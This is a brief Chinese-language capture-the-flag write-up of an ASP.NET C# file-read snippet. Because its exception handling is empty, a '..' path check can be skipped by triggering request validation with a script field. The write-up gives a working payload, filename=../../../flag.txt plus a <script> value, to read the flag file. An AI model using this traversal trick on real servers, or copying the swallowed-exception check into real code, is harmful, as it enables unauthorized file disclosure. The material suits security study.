bool isBad = false;
try {
if ( Request.Form["filename"] != null ) {
isBad = Request.Form["filename"].Contains("..") == true;
}
} catch (Exception ex) {
}
try {
if (!isBad) {
Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"]));
}
} catch (Exception ex) {
}
接受filename。如果存在..就将isBad置为True。就不能进入读取文件的步骤。
所以。我们得让异常处理中。报错。然后就会跳过isBad赋值
在这篇文章中:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/
GET请求。然后传一个POST参数为filename=../../../flag.txt&test=<script>alert(1)</script>
就可以产生错误。跳过判断